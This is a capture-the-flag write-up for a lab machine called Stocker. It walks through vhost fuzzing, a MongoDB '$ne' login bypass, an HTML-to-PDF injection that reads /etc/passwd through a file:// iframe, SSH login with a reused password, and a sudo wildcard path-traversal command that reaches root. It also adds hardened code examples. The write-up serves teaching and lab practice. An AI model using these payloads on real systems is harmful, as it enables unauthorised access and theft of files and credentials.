
Stocker

Enumeration

nmap

nmap shows two open ports: 22 and 80.

wfuzz

```bash
# --hc 301 hides the redirect the default vhost returns, so only real vhosts are listed
wfuzz -c -t 50 -u http://stocker.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.stocker.htb" --hc 301
```

or

gobuster

```bash
# --append-domain turns each wordlist entry into <word>.stocker.htb
gobuster vhost -u http://stocker.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain
```

dev.stocker.htb - Express Mongo NoSQL

We start by capturing a login request in Burp Suite.

Capturing a login request in Burp

This server is running Express. The dev application is backed by MongoDB, a document database that stores JSON-like documents and is queried with operator objects rather than SQL strings. That removes classic SQL injection, but not injection as such: if the application passes the parsed request body straight into a query, an attacker who controls the JSON can supply query operators such as `$ne` or `$regex` where the code expects a plain string.

This goes over the exploitation process more in depth.

We can use a JSON authentication bypass from PayloadsAllTheThings.

We set the Content-Type to application/json (so Express parses the body into an object instead of flat strings) and send this JSON body to the login endpoint, which gets us access to /stock:

```json
{"username": {"$ne": null}, "password": {"$ne": null}}
```
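Why that body logs in, and the check that stops it, as an added example that is not code from the writeup or from the box. The users list, field names and the matcher are constructed stand-ins for MongoDB's query engine (only equality and `$ne` are modelled); the handler names `loginVulnerable` and `loginHardened` are hypothetical.

```javascript
// Added example (not from the original writeup): MongoDB operator injection in a login handler.
// The users list is constructed sample data, not the box's real collection.
const users = [
  { username: "admin", password: "hunter2" },
  { username: "guest", password: "guest" },
];

// Tiny subset of MongoDB matching semantics: a field compares for equality unless the
// query value is an object carrying an operator, in which case the operator is applied.
function fieldMatches(actual, expected) {
  if (expected !== null && typeof expected === "object") {
    if ("$ne" in expected) return actual !== expected.$ne;
    throw new Error("operator not modelled: " + Object.keys(expected).join(","));
  }
  return actual === expected;
}

// Stand-in for collection.findOne(query).
function findOne(collection, query) {
  return collection.find(doc => Object.keys(query).every(k => fieldMatches(doc[k], query[k]))) || null;
}

// Vulnerable pattern: req.body (an object when Content-Type is application/json) is
// spliced straight into the query, so attacker-supplied JSON objects become query operators.
function loginVulnerable(body) {
  return findOne(users, { username: body.username, password: body.password });
}

// Hardened pattern: both credentials must be plain, bounded strings before they reach the query.
function isCredentialString(v) {
  return typeof v === "string" && v.length > 0 && v.length <= 256;
}
function loginHardened(body) {
  if (!isCredentialString(body.username) || !isCredentialString(body.password)) {
    return null; // objects, arrays and therefore operators are rejected outright
  }
  return findOne(users, { username: body.username, password: body.password });
}

// The PayloadsAllTheThings bypass used above: every document has a username and a
// password that are "not equal to null", so the first user in the collection matches.
const bypass = { username: { $ne: null }, password: { $ne: null } };
```

The type check is the minimum fix. In a properly built login the password never appears in the query at all: look the user up by username only, then compare a password hash in application code, and the `$ne` trick has nothing to match against.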

LFI

Adding stock and capturing the add-to-cart request in the Burp Suite proxy shows that the application uses more JSON to build the PDF receipt. The item fields are rendered into HTML on the server before being converted to a PDF, so we can modify the JSON and perform server-side XSS: HTML we inject is rendered by the server's PDF engine, which can read local files on the box.

Dynamic server-side XSS
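The pattern behind that file read, shown as an added example that is not the writeup's or the box's code. It assumes the dev app interpolates cart item fields into an HTML receipt and hands the HTML to a server-side PDF renderer; the `file://` iframe in the constructed cart is the classic illustrative payload for such renderers, not the exact string used on the box, and the function names are hypothetical.

```javascript
// Added example (not from the original writeup): HTML injection into a server-rendered PDF.

// Vulnerable: item fields from the cart JSON are interpolated straight into the HTML
// that the server-side renderer turns into the PDF.
function receiptHtmlVulnerable(items) {
  const rows = items.map(i => `<tr><td>${i.title}</td><td>${i.price}</td></tr>`).join("");
  return `<html><body><h1>Receipt</h1><table>${rows}</table></body></html>`;
}

// Hardened: escape every untrusted text field and coerce numeric fields to numbers.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}
function receiptHtmlHardened(items) {
  const rows = items.map(i => {
    const price = Number(i.price);
    if (!Number.isFinite(price)) throw new TypeError("price must be numeric");
    return `<tr><td>${escapeHtml(i.title)}</td><td>${price.toFixed(2)}</td></tr>`;
  }).join("");
  return `<html><body><h1>Receipt</h1><table>${rows}</table></body></html>`;
}

// Constructed cart in the shape captured in Burp. Because the renderer runs on the
// server, a file:// iframe in the title is rendered with the server's filesystem access.
const maliciousCart = [
  { title: '<iframe src="file:///etc/passwd" width="800" height="800"></iframe>', price: 1 },
];

// Does the generated document still contain an active iframe tag?
function containsLiveIframe(html) {
  return /<iframe\s/i.test(html);
}
```

Escaping fixes the injection; defence in depth is to run the PDF renderer with local file access disabled and in its own sandbox, so that even a missed escape cannot reach `/etc/passwd` or the application source.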

We pick up a few users here:

```text
mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
```

Let's try to read some more files. This server is running Express on Node.js, and the dev web root can be assumed to be /var/www/dev, so we can read its index.js with our file read and pull the database credentials out of it.

MongoDB credentials located inside the dev index.js

The MongoDB password is reused for the angoose account, so we can use these credentials to log in over SSH as angoose.

system

Pick up the first flag

It is pretty easy to pwn the machine from here. Running `sudo -l`:

```text
[sudo] password for angoose: 
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js

With a tst.js in angoose's home directory that reads root's flag, we can use directory traversal to get the final flag. The sudo rule matches the wildcard against the argument text and never canonicalises the path, so a path that starts with /usr/local/scripts/ and ends in .js is accepted even though the `..` components take it somewhere else entirely:

```bash
sudo /usr/bin/node /usr/local/scripts/../../../../home/angoose/tst.js
```

This box took me weeks to finish. I am currently trying to focus on my weaknesses, which are exploiting the many different underlying web technologies.

This post is licensed under CC BY 4.0 by the author.